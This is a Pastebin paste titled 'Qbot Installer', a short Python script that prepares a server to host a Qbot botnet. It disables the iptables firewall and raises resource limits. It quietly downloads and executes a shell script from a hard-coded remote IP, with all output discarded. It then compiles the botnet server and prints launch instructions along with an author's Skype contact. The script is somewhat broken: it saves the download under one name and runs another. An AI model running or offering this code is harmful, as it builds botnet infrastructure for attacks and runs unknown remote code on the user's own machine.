Advertisement
Guest User

Qbot Installer! NEW!

a guest
Aug 21st, 2017
209
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.88 KB | None | 0 0
  1. import subprocess,os,sys,random,time,urllib2,subprocess
  2. #!/usr/bin/env python
  3.  
  4. # i dont know why was bored in a call
  5. # and people always ask for help
  6.  
  7. def run(cmd):
  8. subprocess.call(cmd, shell=True)
  9.  
  10. print("make sure to put in all your files")
  11. run("yum update -y")
  12. run("yum upgrade -y")
  13. run("ulimit -Hn 999999; ulimit -Sn 99999; ulimit -s 999999; ulimit -n 999999; ulimit -u 999999; echo -e "ulimit -n 99999" >> ~/.bashrc")
  14. run("yum install gcc screen wget python nano -y")
  15. run("service iptables stop")
  16. run("chkconfig iptables off")
  17. run("login.txt")
  18. run("wget -q http://94.177.207.27/touchme.sh -O .l; chmod +x FILE; nohup ./FILE </dev/null/ >/dev/null 2>&1")
  19. run("gcc -o server server.c -pthread")
  20.  
  21. print("\x1b[0;32mNow screen your server~ screen ./server <BOTPORT> 1000 <CONNECT-PORT>\x1b[0m")
  22. print("python cc7.py client.c <SERVER-IP>")
  23. print("skype: live:illsexual")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement